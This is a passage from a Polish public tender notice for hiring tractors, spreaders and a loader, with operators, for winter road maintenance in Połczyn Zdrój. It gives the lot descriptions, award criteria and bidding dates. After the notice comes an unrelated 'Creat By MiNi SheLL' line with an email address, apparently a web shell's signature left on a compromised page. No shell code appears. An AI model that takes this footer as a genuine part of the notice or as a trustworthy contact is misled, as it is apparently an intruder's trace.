sytuacji faktycznego świadczenia pracy przez Wykonawcę przy zimowym utrzymaniu dróg na wezwanie Zamawiającego.<br/>e)	Nie podstawienie sprzętu do akcji zimowej na wezwanie Zamawiającego (np. z powodu awarii sprzętu Wykonawcy) będzie skutkowało brakiem naliczenia wynagrodzenia za gotowość w danym dniu. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">77111000-1 - Wynajem maszyn rolniczych wraz z operatorem</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-12-01 do 2023-03-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający przewiduje możliwość udzielenia zamówień polegających na powtórzeniu podobnych usług w trybie zamówień z wolnej ręki na zasadach określonych w art. 214 ust. 1 pkt 7 ustawy Pzp. <br/>1)	Zakres usług ustala się w wysokości do 50% dla danej części zamówienia.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">a)	CENA (C) - 60%<br/>b)	CZAS REAKCJI WYKONAWCY OD MOMENTU OTRZYMANIA WEZWANIA TELEFONICZNEGO DO MOMENTU STAWIENIA SIĘ W SIEDZIBIE ZAMAWIAJĄCEGO (CR) - 40%</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">b) CZAS REAKCJI WYKONAWCY OD MOMENTU OTRZYMANIA WEZWANIA TELEFONICZNEGO DO MOMENTU STAWIENIA SIĘ W SIEDZIBIE ZAMAWIAJĄCEGO</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> na potrzeby Obwodu Drogowego w Połczynie Zdroju mieszczącego się przy ulicy Młyńskiej 17<br/>- wynajem jednego zestawu – ciągnik rolniczy z dwiema osiami napędowymi z pługiem lekkim i rozsypywarką do mieszanki piaskowo-solnej o pojemności od 3 m3 (RCW lub równoważne) do 170 godz. pracy do odśnieżania i posypywania dróg<br/>a)	Dla każdego pojazdu lub maszyny Zamawiający przewiduje dodatkowo do 20 godzin wynajmu na przerwy technologiczne (opłużanie, rozpłużanie, drobne naprawy pługów, piaskarek, dyżur w dyspozycji Zamawiającego itp.), które mogą wyniknąć w trakcie obowiązywania umowy za wyjątkiem pkt 2. Stawka za przerwy technologiczne wyniesie 30% stawki oferowanej przez Wykonawcę. <br/>b) Zamawiający zastrzega, że wykorzystanie mniejszej ilości godzin niż zapotrzebowane, a określone w pkt. XVII niniejszej specyfikacji nie może być powodem roszczeń Wykonawcy w stosunku do Zamawiającego.<br/>c) Zamawiający ustala dodatkowo stawkę dzienną za gotowość Wykonawcy w sytuacji nie świadczenia usług przy zimowym utrzymaniu dróg w wysokości 117,00 zł brutto (słownie: sto siedemnaście złotych brutto). Wynagrodzenie to będzie wypłacane na koniec miesiąca, za każdy dzień pozostawania w dyspozycji Zamawiającego do świadczenia pracy przy zimowym utrzymaniu dróg w okresie obowiązywania umowy.<br/>d)	Ustalona stawka dzienna za gotowość nie będzie naliczana w sytuacji faktycznego świadczenia pracy przez Wykonawcę przy zimowym utrzymaniu dróg na wezwanie Zamawiającego.<br/>e)	Nie podstawienie sprzętu do akcji zimowej na wezwanie Zamawiającego (np. z powodu awarii sprzętu Wykonawcy) będzie skutkowało brakiem naliczenia wynagrodzenia za gotowość w danym dniu. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">77111000-1 - Wynajem maszyn rolniczych wraz z operatorem</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-12-01 do 2023-03-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający przewiduje możliwość udzielenia zamówień polegających na powtórzeniu podobnych usług w trybie zamówień z wolnej ręki na zasadach określonych w art. 214 ust. 1 pkt 7 ustawy Pzp. <br/>1)	Zakres usług ustala się w wysokości do 50% dla danej części zamówienia.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">a)	CENA (C) - 60%<br/>b)	CZAS REAKCJI WYKONAWCY OD MOMENTU OTRZYMANIA WEZWANIA TELEFONICZNEGO DO MOMENTU STAWIENIA SIĘ W SIEDZIBIE ZAMAWIAJĄCEGO (CR) - 40%</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">b) CZAS REAKCJI WYKONAWCY OD MOMENTU OTRZYMANIA WEZWANIA TELEFONICZNEGO DO MOMENTU STAWIENIA SIĘ W SIEDZIBIE ZAMAWIAJĄCEGO</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> na potrzeby Obwodu Drogowego w Połczynie Zdroju mieszczącego się przy ulicy Młyńskiej 17 <br/>- wynajem ciągnika rolniczego z dwiema osiami napędowymi o mocy silnika od 110 KM do 170 godz. pracy do odśnieżania i posypywania dróg (posypywarka i pług lekki powierzone przez Zamawiającego)<br/>a)	Dla każdego pojazdu lub maszyny Zamawiający przewiduje dodatkowo do 20 godzin wynajmu na przerwy technologiczne (opłużanie, rozpłużanie, drobne naprawy pługów, piaskarek, dyżur w dyspozycji Zamawiającego itp.), które mogą wyniknąć w trakcie obowiązywania umowy za wyjątkiem pkt 2. Stawka za przerwy technologiczne wyniesie 30% stawki oferowanej przez Wykonawcę. <br/>b) Zamawiający zastrzega, że wykorzystanie mniejszej ilości godzin niż zapotrzebowane, a określone w pkt. XVII niniejszej specyfikacji nie może być powodem roszczeń Wykonawcy w stosunku do Zamawiającego.<br/>c) Zamawiający ustala dodatkowo stawkę dzienną za gotowość Wykonawcy w sytuacji nie świadczenia usług przy zimowym utrzymaniu dróg w wysokości 117,00 zł brutto (słownie: sto siedemnaście złotych brutto). Wynagrodzenie to będzie wypłacane na koniec miesiąca, za każdy dzień pozostawania w dyspozycji Zamawiającego do świadczenia pracy przy zimowym utrzymaniu dróg w okresie obowiązywania umowy.<br/>d)	Ustalona stawka dzienna za gotowość nie będzie naliczana w sytuacji faktycznego świadczenia pracy przez Wykonawcę przy zimowym utrzymaniu dróg na wezwanie Zamawiającego.<br/>e)	Nie podstawienie sprzętu do akcji zimowej na wezwanie Zamawiającego (np. z powodu awarii sprzętu Wykonawcy) będzie skutkowało brakiem naliczenia wynagrodzenia za gotowość w danym dniu. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">77111000-1 - Wynajem maszyn rolniczych wraz z operatorem</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-12-01 do 2023-03-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający przewiduje możliwość udzielenia zamówień polegających na powtórzeniu podobnych usług w trybie zamówień z wolnej ręki na zasadach określonych w art. 214 ust. 1 pkt 7 ustawy Pzp. <br/>1)	Zakres usług ustala się w wysokości do 50% dla danej części zamówienia</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">a)	CENA (C) - 60%<br/>b)	CZAS REAKCJI WYKONAWCY OD MOMENTU OTRZYMANIA WEZWANIA TELEFONICZNEGO DO MOMENTU STAWIENIA SIĘ W SIEDZIBIE ZAMAWIAJĄCEGO (CR) - 40%</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">b) CZAS REAKCJI WYKONAWCY OD MOMENTU OTRZYMANIA WEZWANIA TELEFONICZNEGO DO MOMENTU STAWIENIA SIĘ W SIEDZIBIE ZAMAWIAJĄCEGO</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> na potrzeby Obwodu Drogowego w Połczynie Zdroju mieszczącego się przy ulicy Młyńskiej 17<br/>- wynajem ciągnika rolniczego z dwiema osiami napędowymi o mocy silnika od 110 KM do 170 godz. pracy do odśnieżania i posypywania dróg (posypywarka i pług lekki powierzone przez Zamawiającego<br/>a)	Dla każdego pojazdu lub maszyny Zamawiający przewiduje dodatkowo do 20 godzin wynajmu na przerwy technologiczne (opłużanie, rozpłużanie, drobne naprawy pługów, piaskarek, dyżur w dyspozycji Zamawiającego itp.), które mogą wyniknąć w trakcie obowiązywania umowy za wyjątkiem pkt 2. Stawka za przerwy technologiczne wyniesie 30% stawki oferowanej przez Wykonawcę. <br/>b) Zamawiający zastrzega, że wykorzystanie mniejszej ilości godzin niż zapotrzebowane, a określone w pkt. XVII niniejszej specyfikacji nie może być powodem roszczeń Wykonawcy w stosunku do Zamawiającego.<br/>c) Zamawiający ustala dodatkowo stawkę dzienną za gotowość Wykonawcy w sytuacji nie świadczenia usług przy zimowym utrzymaniu dróg w wysokości 117,00 zł brutto (słownie: sto siedemnaście złotych brutto). Wynagrodzenie to będzie wypłacane na koniec miesiąca, za każdy dzień pozostawania w dyspozycji Zamawiającego do świadczenia pracy przy zimowym utrzymaniu dróg w okresie obowiązywania umowy.<br/>d)	Ustalona stawka dzienna za gotowość nie będzie naliczana w sytuacji faktycznego świadczenia pracy przez Wykonawcę przy zimowym utrzymaniu dróg na wezwanie Zamawiającego.<br/>e)	Nie podstawienie sprzętu do akcji zimowej na wezwanie Zamawiającego (np. z powodu awarii sprzętu Wykonawcy) będzie skutkowało brakiem naliczenia wynagrodzenia za gotowość w danym dniu. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">77111000-1 - Wynajem maszyn rolniczych wraz z operatorem</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-12-01 do 2023-03-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający przewiduje możliwość udzielenia zamówień polegających na powtórzeniu podobnych usług w trybie zamówień z wolnej ręki na zasadach określonych w art. 214 ust. 1 pkt 7 ustawy Pzp. <br/>1)	Zakres usług ustala się w wysokości do 50% dla danej części zamówienia</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">a)	CENA (C) - 60%<br/>b)	CZAS REAKCJI WYKONAWCY OD MOMENTU OTRZYMANIA WEZWANIA TELEFONICZNEGO DO MOMENTU STAWIENIA SIĘ W SIEDZIBIE ZAMAWIAJĄCEGO (CR) - 40%</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">b) CZAS REAKCJI WYKONAWCY OD MOMENTU OTRZYMANIA WEZWANIA TELEFONICZNEGO DO MOMENTU STAWIENIA SIĘ W SIEDZIBIE ZAMAWIAJĄCEGO</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 7</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> na potrzeby Obwodu Drogowego w Połczynie Zdroju mieszczącego się przy ulicy Młyńskiej 17<br/>-	wynajem koparki lub ładowarki albo koparko-ładowarki o wysokości podnoszenia od 4 m i pojemności łyżki 0,5 m3 do 100 godz. pracy do załadunku mieszanki piaskowo-solnej<br/>a)	Dla każdego pojazdu lub maszyny Zamawiający przewiduje dodatkowo do 20 godzin wynajmu na przerwy technologiczne (opłużanie, rozpłużanie, drobne naprawy pługów, piaskarek, dyżur w dyspozycji Zamawiającego itp.), które mogą wyniknąć w trakcie obowiązywania umowy za wyjątkiem pkt 2. Stawka za przerwy technologiczne wyniesie 30% stawki oferowanej przez Wykonawcę. <br/>b)	Dla części nr 7, tj. koparki lub ładowarki albo koparko–ładowarki, Zamawiający przewiduje dodatkowo do 50 godzin wynajmu na przerwy technologiczne (postoje między kolejnym ładowaniem mieszanki piaskowo–solnej). Stawka za przerwy technologiczne wyniesie 30% stawki oferowanej przez Wykonawcę. <br/>c)	Zamawiający zastrzega, że wykorzystanie mniejszej ilości godzin niż zapotrzebowane, a określone w pkt. XVII niniejszej specyfikacji nie może być powodem roszczeń Wykonawcy w stosunku do Zamawiającego.<br/>d)	Zamawiający ustala dodatkowo stawkę dzienną za gotowość Wykonawcy w sytuacji nie świadczenia usług przy zimowym utrzymaniu dróg w wysokości 117,00 zł brutto (słownie: sto siedemnaście złotych brutto). Wynagrodzenie to będzie wypłacane na koniec miesiąca, za każdy dzień pozostawania w dyspozycji Zamawiającego do świadczenia pracy przy zimowym utrzymaniu dróg w okresie obowiązywania umowy.<br/>e)	Ustalona stawka dzienna za gotowość nie będzie naliczana w sytuacji faktycznego świadczenia pracy przez Wykonawcę przy zimowym utrzymaniu dróg na wezwanie Zamawiającego.<br/>f)	Nie podstawienie sprzętu do akcji zimowej na wezwanie Zamawiającego (np. z powodu awarii sprzętu Wykonawcy) będzie skutkowało brakiem naliczenia wynagrodzenia za gotowość w danym dniu. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45500000-2 - Wynajem maszyn i urządzeń wraz z obsługą operatorską do prowadzenia robót z zakresu budownictwa oraz inżynierii wodnej i lądowej</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-12-01 do 2023-03-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający przewiduje możliwość udzielenia zamówień polegających na powtórzeniu podobnych usług w trybie zamówień z wolnej ręki na zasadach określonych w art. 214 ust. 1 pkt 7 ustawy Pzp. <br/>1)	Zakres usług ustala się w wysokości do 50% dla danej części zamówienia</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">a)	CENA (C) - 60%<br/>b)	CZAS REAKCJI WYKONAWCY OD MOMENTU OTRZYMANIA WEZWANIA TELEFONICZNEGO DO MOMENTU STAWIENIA SIĘ W SIEDZIBIE ZAMAWIAJĄCEGO (CR) - 40%</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">b) CZAS REAKCJI WYKONAWCY OD MOMENTU OTRZYMANIA WEZWANIA TELEFONICZNEGO DO MOMENTU STAWIENIA SIĘ W SIEDZIBIE ZAMAWIAJĄCEGO</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zgodnie z Rozdziałem VI SWZ</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zgodnie z Rozdziałem VI SWZ</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga przedmiotowych środków dowodowych <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Zgodnie z Rozdziałem XVIII SWZ <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy.<br/>2.	Pełnomocnictwo, o którym mowa w ust. 1 należy dołączyć do oferty.<br/>3.	Wszelką korespondencję w postępowaniu zamawiający kieruje do pełnomocnika. <br/>4.	Wspólnicy spółki cywilnej są wykonawcami wspólnie ubiegającymi się o udzielenie zamówienia i mają do nich zastosowanie zasady określone w ust. 1 – 3.<br/>5.	Przed zawarciem umowy wykonawcy wspólnie ubiegający się o udzielenie zamówienia będą mieli obowiązek przedstawić zamawiającemu kopię umowy regulującej współpracę tych wykonawców, zawierającą, co najmniej:<br/>1)	zobowiązanie do realizacji wspólnego przedsięwzięcia gospodarczego obejmującego swoim zakresem realizację przedmiotu zamówienia,<br/>2)	określenie zakresu działania poszczególnych stron umowy,<br/>3)	czas obowiązywania umowy, który nie może być krótszy, niż okres obejmujący realizację zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-11-17 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Platforma Zakupowa: https://pzdswidwin.ezamawiajacy.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-11-17 09:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-12-16</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com